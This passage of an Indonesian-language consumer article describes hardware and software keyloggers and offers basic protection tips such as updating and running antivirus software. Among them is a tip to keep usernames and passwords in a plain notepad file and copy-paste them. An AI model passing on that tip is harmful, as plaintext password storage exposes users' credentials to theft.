Keylogger perangkat keras hadir dalam bentuk perangkat USB yang dapat dihubungkan ke sistem komputer. Jenis keylogger khusus ini dibangun di bagian belakang unit pemrosesan pusat (CPU) dan menangkap aktivitas keyboard.
Perangkat Lunak Keylogger:
Keylogger perangkat lunak dibangun ke dalam perangkat lunak dan program yang diinstal atau diinstal pada komputer Anda. Saat kita menginstal perangkat lunak apa pun di sistem komputer, file tertentu dibuat secara otomatis. File-file ini bisa jadi jahat dan dapat merekam serta mencuri informasi dari komputer Anda.
Apa pun jenis keylogger yang memengaruhi komputer Anda, setiap keylogger dapat menyebabkan kerugian yang tidak dapat diubah.
Oleh karena itu, sangat penting untuk segera mendeteksi keylogger untuk mencegah pencurian data penting.
Anda dapat melindungi komputer Anda dengan memperbarui perangkat lunak antivirus Anda. Penggunaan pendeteksi virus sering kali juga membantu mendeteksi dan mencegah program jahat apa pun.
Ada juga satu trik untuk mencegah Anda kehilangan segala jenis informasi melalui keyboard, Anda dapat menyimpan data seperti nama pengguna dan kata sandi di notepad dan menyalin dan menempelkan detailnya bila diperlukan.
Namun, dalam kasus ini, Anda harus ekstra hati-hati terhadap data yang disimpan di notepad karena peretas dapat mencuri informasi tersebut. Risiko peretasan ada dimana-mana, namun hal tersebut tidak boleh menghentikan kita untuk menggunakan gadget digital.
Gunakan perangkat pintar dengan kewaspadaan. Jangan biarkan sesuatu seperti keylogger menghentikan Anda untuk bergerak maju di jalur Anda. Pastikan sistem komputer Anda mutakhir dan semua program berfungsi dengan baik.
Menjalankan perangkat lunak antivirus secara teratur juga dapat membantu melindungi komputer Anda saat Anda online maupun offline.